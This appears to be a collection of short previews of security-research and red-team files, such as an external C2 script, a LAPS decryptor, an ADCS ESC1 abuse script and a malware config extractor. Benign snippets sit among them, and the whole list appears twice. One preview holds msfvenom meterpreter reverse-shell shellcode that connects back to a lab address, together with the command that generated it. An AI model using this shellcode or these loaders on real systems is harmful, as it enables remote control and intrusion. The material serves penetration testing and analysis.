pdolinic

## zendesk_endpoints.txt
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects

## finetune_llama_v2.py
# coding=utf-8
# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software

## extc2.py
#
# ROGUE
#
# GuidePoint Security LLC
#
# Threat and Attack Simulation Team
#
import os
import sys
import click

## vdm_lua_extract.py
### Original script and research by commial
### https://github.com/commial/experiments/tree/master/windows-defender
### Set LUADec_Path to binary
### https://github.com/viruscamp/luadec
import struct
import argparse
import sys
import os
import io
import subprocess

## LAPSDecrypt.cs
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Security.Principal;
using System.Text;

## RtlRunOnceExecuteOnceShellcodeExec.c
#include <windows.h>
#include <stdio.h>

extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

## sample.py
import re
import asyncio
from playwright.async_api import async_playwright


USERNAME = "TYPE YOUR USERNAME HERE"
PASSWORD = "TYPE YOUR PASSWORD HERE"
HOST = "zproxy.lum-superproxy.io:9222"

URL = "https://www.svpino.com/" # USE YOUR URL HERE

## esc1.ps1
#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

## gpt.py
import openai
import boto3
import json
import time
from typing import Dict, List

openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')

## ExtractMassloggerConfig_PowerShell_Reflection.ps1
# Simple show-off using PowerShell and Reflection to extract masslogger config
# Example Sample: https://bazaar.abuse.ch/sample/7187a6d2980e3696396c4fbce939eeeb3733b6afdf2e859a385f8d6b29e8cebc/
# Twitter Info: https://twitter.com/vinopaljiri/status/1593125307468623874

 # get the class where config is initialized -> careful, by this we invoked the constructor and all fields are already populated but encrypted
$configClass = [System.Reflection.Assembly]::LoadFile("C:\Users\Inferno\Desktop\test\sample.exe").GetTypes() | ? {$_.Name -like "xmA"}

 # class is static so we are not creating instance of it in Invoke
 # by invoking this method, config gets decrypted so also its responsible fields (remember reflection Rocks :))
($configClass.GetMethods() | ? {$_.Name -like "Aak"}).Invoke($null, $null) | Out-Null
	POST /api/v2/accounts
	GET /api/v2/activities?since=cstest
	GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
	GET /api/v2/automations
	POST /api/v2/automations
	GET /api/v2/bookmarks
	POST /api/v2/bookmarks
	GET /api/v2/brands
	POST /api/v2/brands
	GET /api/v2/custom_objects
	# coding=utf-8
	# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
	#
	# Licensed under the Apache License, Version 2.0 (the "License");
	# you may not use this file except in compliance with the License.
	# You may obtain a copy of the License at
	#
	# http://www.apache.org/licenses/LICENSE-2.0
	#
	# Unless required by applicable law or agreed to in writing, software
	#
	# ROGUE
	#
	# GuidePoint Security LLC
	#
	# Threat and Attack Simulation Team
	#
	import os
	import sys
	import click
	### Original script and research by commial
	### https://github.com/commial/experiments/tree/master/windows-defender
	### Set LUADec_Path to binary
	### https://github.com/viruscamp/luadec
	import struct
	import argparse
	import sys
	import os
	import io
	import subprocess
	using System;
	using System.Collections.Generic;
	using System.DirectoryServices.Protocols;
	using System.Globalization;
	using System.Linq;
	using System.Runtime.InteropServices;
	using System.Runtime.InteropServices.ComTypes;
	using System.Security.Policy;
	using System.Security.Principal;
	using System.Text;
	#include <windows.h>
	#include <stdio.h>

	extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE once, PRTL_RUN_ONCE_INIT_FN func, void param, void **context);
	typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

	// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
	unsigned char shellcode_bin[] =
	"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	import re
	import asyncio
	from playwright.async_api import async_playwright


	USERNAME = "TYPE YOUR USERNAME HERE"
	PASSWORD = "TYPE YOUR PASSWORD HERE"
	HOST = "zproxy.lum-superproxy.io:9222"

	URL = "https://www.svpino.com/" # USE YOUR URL HERE
	#Thank you @NotMedic for troubleshooting/validating stuff!

	$password = Read-Host -Prompt "Enter Password"
	#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

	$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
	$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
	$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
	$CASERVER = "alexlab-dc01-ca" #CA name.
	$CA = $CAFQDN + "\" + $CASERVER
	import openai
	import boto3
	import json
	import time
	from typing import Dict, List

	openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
	session = boto3.session.Session()
	client = session.client('iam')
	# Simple show-off using PowerShell and Reflection to extract masslogger config
	# Example Sample: https://bazaar.abuse.ch/sample/7187a6d2980e3696396c4fbce939eeeb3733b6afdf2e859a385f8d6b29e8cebc/
	# Twitter Info: https://twitter.com/vinopaljiri/status/1593125307468623874

	# get the class where config is initialized -> careful, by this we invoked the constructor and all fields are already populated but encrypted
	$configClass = [System.Reflection.Assembly]::LoadFile("C:\Users\Inferno\Desktop\test\sample.exe").GetTypes() \| ? {$_.Name -like "xmA"}

	# class is static so we are not creating instance of it in Invoke
	# by invoking this method, config gets decrypted so also its responsible fields (remember reflection Rocks :))
	($configClass.GetMethods() \| ? {$_.Name -like "Aak"}).Invoke($null, $null) \| Out-Null